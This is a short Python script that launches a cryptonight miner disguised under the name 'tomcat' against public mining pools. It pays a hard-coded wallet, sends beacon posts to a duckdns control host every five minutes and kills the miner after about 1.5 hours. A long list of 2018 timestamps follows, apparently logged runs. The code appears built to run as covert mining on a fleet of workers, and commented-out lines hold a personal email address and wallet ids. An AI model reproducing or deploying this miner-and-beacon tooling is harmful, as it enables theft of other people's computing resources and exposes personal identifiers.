import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:05.146259
#2018-02-17 17:07:04.523703
#2018-02-17 18:55:06.645496
#2018-02-17 20:43:05.676921
#2018-02-17 22:29:07.362109
#2018-02-18 00:12:05.408956
#2018-02-18 02:04:05.352341
#2018-02-18 03:50:06.680011
#2018-02-18 05:38:05.989519
#2018-02-18 07:31:05.735291
#2018-02-18 09:19:01.705925
#2018-02-18 11:04:06.489010
#2018-02-18 12:51:04.718476
#2018-02-18 14:39:04.004920
#2018-02-18 16:28:04.409103
#2018-02-18 18:17:04.020383
#2018-02-18 20:02:01.776612
#2018-02-18 21:48:06.469068
#2018-02-18 23:37:06.479700
#2018-02-19 01:23:03.908466
#2018-02-19 03:12:05.723897
#2018-02-19 04:58:07.136442
#2018-02-19 06:44:05.353483
#2018-02-19 08:34:06.367526
#2018-02-19 10:23:06.407722
#2018-02-19 12:11:08.071436
#2018-02-19 13:58:05.768840
#2018-02-19 15:47:07.615847
#2018-02-19 17:36:04.596263
#2018-02-19 19:23:01.493008
#2018-02-19 21:09:03.916837
#2018-02-19 22:55:03.061154
#2018-02-20 00:38:07.582860
#2018-02-20 02:27:04.393587
#2018-02-20 04:18:01.271395
#2018-02-20 06:02:04.481690
#2018-02-20 07:47:04.779522
#2018-02-20 09:33:05.551765
#2018-02-20 11:17:07.023023
#2018-02-20 13:03:07.281011
#2018-02-20 14:46:06.533844
#2018-02-20 16:31:01.623474
#2018-02-20 18:17:08.071004
#2018-02-20 20:08:04.494393
#2018-02-20 21:55:06.692518
#2018-02-20 23:37:06.099332
#2018-02-21 01:21:06.522803
#2018-02-21 03:09:07.233185
#2018-02-21 04:57:06.217923
#2018-02-21 06:43:01.527240
#2018-02-21 08:29:06.141276
#2018-02-21 10:14:08.066774
#2018-02-21 12:03:05.475191
#2018-02-21 13:51:06.158104
#2018-02-21 15:35:04.110387
#2018-02-21 17:24:07.453563
#2018-02-21 19:11:08.592768
#2018-02-21 20:58:07.459584
#2018-02-21 22:44:04.316283
#2018-02-22 00:34:06.615354
#2018-02-22 02:23:07.696958
#2018-02-22 04:10:06.246470
#2018-02-22 05:55:04.943528
#2018-02-22 07:41:07.191846
#2018-02-22 09:29:05.479464
#2018-02-22 11:15:10.962892
#2018-02-22 13:02:02.068862
#2018-02-22 14:50:08.415867
#2018-02-22 16:36:08.557384
#2018-02-22 18:22:04.295112
#2018-02-22 20:16:05.000718
#2018-02-22 22:03:06.946349
#2018-02-22 23:49:07.465876
#2018-02-23 01:37:07.829489
#2018-02-23 03:25:05.790945
#2018-02-23 05:11:06.056828
#2018-02-23 06:57:06.031485
#2018-02-23 08:48:06.021615
#2018-02-23 11:08:06.896475
#2018-02-23 13:02:10.444347
#2018-02-23 14:47:07.726440
#2018-02-23 16:36:02.072718
#2018-02-23 18:22:04.568843
#2018-02-23 20:06:08.164335
#2018-02-23 21:55:06.426598
#2018-02-23 23:45:04.959678
#2018-02-24 01:33:07.821352
#2018-02-24 03:24:04.497012
#2018-02-24 05:09:05.887804
#2018-02-24 06:58:03.663112
#2018-02-24 08:48:04.963636
#2018-02-24 10:49:04.113880
#2018-02-24 12:36:06.627573
#2018-02-24 14:25:02.134077
#2018-02-24 16:13:03.382722
#2018-02-24 18:06:01.699574
#2018-02-24 19:51:07.616483
#2018-02-24 21:35:05.725544
#2018-02-25 00:24:03.452218
#2018-02-25 04:10:06.493737
#2018-02-25 07:41:01.306091